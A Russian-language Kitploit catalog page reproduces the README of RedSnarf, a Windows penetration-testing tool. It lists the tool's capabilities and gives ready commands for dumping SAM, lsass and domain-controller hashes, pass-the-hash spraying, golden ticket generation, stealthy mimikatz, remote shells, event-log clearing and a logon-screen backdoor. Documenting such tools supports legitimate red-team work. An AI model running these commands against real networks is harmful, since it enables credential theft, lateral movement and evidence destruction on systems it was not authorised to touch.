Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
redsnarf — RedSnarf — это инструмент для пентеста / ред-тиминга, предназначенный для сред Windows. | Kitploit
Инструменты/GitHubGitHub/nccgroup/redsnarf
Взлом паролейПовышение привилегийГенерация полезной нагрузкиЭксплуатацияАнализ хэшейЛатеральное перемещениеСбор информацииПост-эксплуатацияТестирование на ПроникновениеКомандование и УправлениеRed TeamingИнструмент Удаленного Доступа
1.2k235249 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
GitHubnccgroup/redsnarf

redsnarf

RedSnarf — это инструмент для пентеста / ред-тиминга, предназначенный для сред Windows.

РепозиторийСайт
    ______           .____________                     _____  
\______   \ ____   __| _/   _____/ ____ _____ ________/ ____\ 
 |       _// __ \ / __ |\_____  \ /    \\__  \\_  __ \   __\  
 |    |   \  ___// /_/ |/        \   |  \/ __ \|  | \/|  |    
 |____|_  /\___  >____ /_______  /___|  (____  /__|   |__|    
        \/     \/     \/       \/     \/     \/         
                                  [email protected]
                                                  @redsnarf

GitHub license

RedSnarf — это инструмент для пентестинга / red-команд от Ed Williams, предназначенный для извлечения хэшей и учётных данных с рабочих станций, серверов и контроллеров домена Windows с использованием методов, безопасных для OpSec.

Смотрите наш канал на YouTube с видео: https://www.youtube.com/channel/UCDGWRxpHo6d8y6qIeMAXnxQ

Функциональность RedSnarf включает:

• Извлечение локальных SAM-хэшей
• Перечисление пользователей, работающих с повышенными привилегиями системы, и соответствующих паролей lsa secrets
• Извлечение кэшированных учётных данных MS
• Pass-the-hash
• Быстрое определение слабых и подбираемых комбинаций имя пользователя/пароль (по умолчанию administrator/Password01)
• Возможность извлекать хэши в диапазоне адресов
• Распыление хэшей —
Credsfile принимает смесь pwdump, fgdump и простых текстовых имён пользователей и паролей, разделённых пробелом
• Дамп lsass для офлайн-анализа с помощью Mimikatz
• Дамп хэшей контроллера домена с помощью NTDSUtil и извлечение NTDS.dit для локального разбора
• Дамп хэшей контроллера домена методом drsuapi
• Извлечение папки Scripts и Policies с контроллера домена и поиск в ней 'password' и 'administrator'
• Возможность расшифровки хэшей cpassword
• Возможность запуска оболочки на удалённой машине
• Возможность очистки журналов событий (приложение, безопасность, установка или система); (только во внутренней версии)
• Результаты сохраняются по каждому хосту для анализа
• Включение/отключение RDP на удалённой машине
• Изменение порта RDP с 3389 на 443 на удалённой машине
• Включение/отключение NLA на удалённой машине
• Поиск мест, где пользователи вошли в систему на удалённых машинах
• Бэкдор на экране входа Windows
• Включение/отключение UAC на удалённой машине
• Добавлен скрытный mimikatz
• Разбор доменных хэшей
• Определение, какие учётные записи включены/отключены
• Снятие скриншота рабочего стола активного удалённого пользователя
• Запись рабочего стола активного удалённого пользователя
• Расшифровка Windows CPassword
• Расшифровка пароля WinSCP
• Получение SPN пользователя
• Извлечение паролей Wi-Fi с удалённых машин

Использование RedSnarf

Требования:
Impacket v0.9.16-dev — https://github.com/CoreSecurity/impacket.git
CredDump7 — https://github.com/Neohapsis/creddump7
Извлечение lsass с помощью procdump — https://technet.microsoft.com/en-us/sysinternals/dd996900.aspx
Netaddr (0.7.12) — pip install netaddr
Termcolor (1.1.0) — pip install termcolor
iconv — используется для локального разбора информации Mimikatz

Показать справку
./redsnarf.py -h
./redsnarf.py --help

Извлечение локальных хэшей

Извлечение локальных хэшей с одной машины, используя слабые локальные учётные данные и очистка журнала безопасности
./redsnarf.py -H ip=10.0.0.50 -uC security

Извлечение локальных хэшей с одной машины, используя слабые локальные учётные данные и очистка журнала приложений
./redsnarf.py -H ip=10.0.0.50 -uC application

Извлечение локальных хэшей с одной машины, используя учётные данные локального администратора
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d .

Извлечение локальных хэшей с одной машины, используя учётные данные администратора домена
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com

Извлечение хэшей в сетевом диапазоне, используя учётные данные локального администратора
./redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d .

Извлечение хэшей в сетевом диапазоне, используя учётные данные администратора домена
./redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d yourdomain.com

Извлечение хэшей в сетевом диапазоне, используя учётные данные администратора домена
./redsnarf.py -H file=targets.txt -u administrator -p Password01 -d yourdomain.com

Распыление хэшей

Распыление хэшей в сетевом диапазоне
./redsnarf.py -H range=10.0.0.1/24 -hS credsfile -d .

Извлечение хэшей в сетевом диапазоне с доменным входом
./redsnarf.py -H range=10.0.0.1/24 -hS credsfile -d yourdomain.com

Быстрая проверка учётных данных
./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password1 -d . -cQ y

Быстрая проверка файла с именами пользователей (-hS) и общим паролем (-hP)
./redsnarf.py -H ip=10.0.0.1 -hS /path/to/usernames.txt -hP PasswordToTry -cQ y

Извлечение доменных хэшей

Извлечение хэшей методом drsuapi (самый быстрый)
Этот метод поддерживает дополнительный флаг -q y, который запрашивает LDAP и выводит, активны учётные записи или отключены.
./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -hI y (-hQ y)

Извлечение хэшей с помощью NTDSUtil
Этот метод поддерживает дополнительный флаг -q y, который запрашивает LDAP и выводит, активны учётные записи или отключены.
./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -hN y (-hQ y)

Генерация золотого билета
./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -hT y

Сбор информации

Копирование папки Policies и Scripts с контроллера домена и поиск в ней password и administrator
./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -uP y

Расшифровка Cpassword
./redsnarf.py -uG cpassword

Поиск пользователя — онлайн
/redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d yourdomain.com -eL user.name

Поиск пользователя — офлайн (поиск по предварительно загруженной информации)
/redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d yourdomain.com -eO user.name

Вывод списка задач NT AUTHORITY\SYSTEM
/redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -eT y

Снимок экрана рабочего стола удалённого активного пользователя
/redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -eS y

Разное

Запуск оболочки на машине, используя учётные данные локального администратора
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d . -uD y

Запуск оболочки на машине, используя учётные данные администратора домена
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uD y

Извлечение копии lsass для офлайн-анализа с Mimikatz на машине, используя учётные данные локального администратора
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d . -hL y

Запуск скрытного mimikatz; этот вариант запускает веб-сервер для предоставления PowerShell-скрипта, который обфусцирован и закодирован на стороне машины; данные не касаются диска — учётные данные извлекаются в удобном для чтения виде и выводятся на экран.
./redsnarf.py -H ip=192.168.198.162 -u administrator -p Password01 -cS y -hR y

Выполнение произвольной команды
Пример 1
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uX 'net user'

Пример 2 — Двойные кавычки нужно экранировать с помощью \

Скачать инструмент